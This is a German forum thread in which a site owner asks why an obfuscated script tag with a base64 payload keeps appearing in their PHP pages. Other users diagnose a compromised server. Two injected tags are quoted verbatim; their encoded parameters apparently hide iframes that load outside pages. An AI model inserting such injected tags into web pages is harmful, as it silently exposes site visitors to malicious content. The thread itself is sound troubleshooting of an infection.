JavaScript File wird automatisch bei Website eingebunden

    Hallo,

    ich habe ein (für mich) großes Problem.
    Ich programmiere derzeit eine Webseite mit HTML CSS und PHP, die unter anderem mit jQuery 1.4.2 läuft. Sonst sind keine Frameworks vorhanden.

    Komischerweise passiert bei einem Include-Befehl, in dem wiederrum eine Klasse aufgerufen wird, etwas misteriöses:
    In der Include-Datei wird zwischen einem "<br>" und dem Aufruf der Klasse diese JavaScript-Datei eingebunden:

    <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly93d3cuZmxhZy5lZHUuYXUvaS9pLmh0bWwnIHN0eWxlPSdkaXNwbGF5OiBub25lJz4=;t=002'></script>

    Ich weiss nicht, warum sie eingebunden wird und ich weiss auch nicht, warum mein AVG-Virenprogramm da anspringt.
    AVG Meldung:
    Exploit: JavaScript Obfuscation (type 1491)
    (laut mcafee 1491 INFO - HTTP: Web Application Error Message Disclosure III (0x4028f200))

    Kann mich jemand aufklären? Was hat diese JS-Datei zu bedeuten und bei welchen Fehlern wird sie eingebunden?

    Liebe Grüße

    Zitat von Sören Hentzschel

    Und das passiert ausschließlich in Firefox?


    Es scheint so! Es ist allerdings unberechenbar, da der Fehler nicht immer auftaucht. Ich würde sagen, er kommt, wann´s ihm passt, aber eine periode ist dahinter nicht zu erkennen!
    Vermutlich hat das was mit der Programm-Syntax zutun. Aber wie kann ich denn herausfinden, was genau für ein Problem vorliegt?

    Hi,

    ich habe das gerade noch einmal ausführlich ausprobiert und bin zu folgendem Ergebnis gekommen:
    Es hat nichts mit meinem Script zutun, denn wenn ich ein Script mit einfachen HTML- und PHP-Befehlen schreibe, erhalte ich selbst da ein Fehler.
    Ich habe mich bereits an AVG gewendet, doch Hilfe kann man da in der Free Version nicht erwarten.
    Ich vermute auch, dass es ein Problem an Firefox selbst ist, da dies auch in der Fehlermeldung angezeigt wird (siehe Anhang).
    Allerdings wird auch bei Chrome folgender Code vor dem </bod>-Tag eingefügt:
    <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly93d3Mydy5qdW1waW5nY3JhYi5jb20vdC84ODk5YmRhOWQ4ODAyYTlhYzRhN2Q4OGM1MTgyZTQ5NCcgc3R5bGU9J2Rpc3BsYXk6IG5vbmUnPg==;t=645'></script>
    Es erscheint bei Google Chrome aber keine Fehlermeldung.

    Mein versuchter Code sieht wie folgt aus:

    Alle beigefügten Screenshots sind bei diesem, wirklich simplen Code, entstanden.

    Ich bitte um Hilfe zur Lösung des Problems!! Wäre unschätzbar dankbar!

    Zitat von jdizzle

    Allerdings wird auch bei Chrome folgender Code vor dem </bod>-Tag eingefügt:
    <script src='/paralex.js?id=PGlmcmFtZSBzcmM9J2h0dHA6Ly93d3Mydy5qdW1waW5nY3JhYi5jb20vdC84ODk5YmRhOWQ4ODAyYTlhYzRhN2Q4OGM1MTgyZTQ5NCcgc3R5bGU9J2Rpc3BsYXk6IG5vbmUnPg==;t=645'></script>


    Genau daher meine Frage weiter oben. Das wäre nämlich sehr unwahrscheinlich gewesen, dass das nur in Firefox passiert. Damit ist das kein Firefox-Problem und du kannst ziemlich sicher davon ausgehen, dass dein System infiziert bzw. der Server/Webspace kompromittiert ist, falls das Problem online auftritt.

    Zitat von 2002Andreas


    Kannst du ja mal zu deiner Sicherheit überprüfen.

    Nach Malware scannen...../.....Deutsche Anleitung dazu

    Da dann bitte nach einem Update einen vollständigen Scan machen und den dann bitte hier im Antwortfenster nach Klick auf den Button: ..Code.. hier einfügen. Und bitte nichts löschen vorher !


    Zusammengefasst liegt das Problem also am Server und nicht an dem Virenschutzprogramm, Firefox oder meinem Code!? (Es tritt online auf!)
    Da ich leider nur Besitzer eines Webservers bin und nicht Zugriff auf den gesamten Server habe, werde ich damit meinen Provider beauftragen. Aber mir sind schon vor Kurzem komische Dinge aufgefallen, die ggf. darauf hindeuten könnten, dass bei dem Server nicht alles in Ordnung ist.

    Ob das am Server oder an deinem Rechner liegt, lässt sich leicht raus finden. Wenn andere Leute beim Aufruf der Seite diese Codeschnippsel nicht haben, sondern NUR du, dann liegts nicht am Server, sondern auf DEINEM Rechner ist der Schädling. Wenn auch andere den Codeschnippsel haben, dann liegts am Server.

    Zitat von bugcatcher

    Ob das am Server oder an deinem Rechner liegt, lässt sich leicht raus finden. Wenn andere Leute beim Aufruf der Seite diese Codeschnippsel nicht haben, sondern NUR du, dann liegts nicht am Server, sondern auf DEINEM Rechner ist der Schädling. Wenn auch andere den Codeschnippsel haben, dann liegts am Server.


    Genau das werde ich heute Abend noch herausfinden und dann Rückmeldung abgeben :)
    Danke vorerstmal!

    Das Problem liegt definitiv nicht an meinem Firefox, sondern am Server. Ich habe es soeben noch an einem anderen PC getestet, der Avira und nicht AVG verwendet und dort tritt der Fehler ebenfalls auf.
    Ich habe soeben meinem Webhoster eine lange E-Mail geschrieben und ihn aufgefordert, diesen Fehler zu beheben.
    Ich finde es schade, dass ich soviel Zeit investieren musste, um die Ursache eines Fehlers herauszufinden, den ich nicht zu verschulden habe.
    Ich danke euch jedoch von Herzen, dass ihr mir auf die Sprünge geholfen habt.

    Liebe Grüße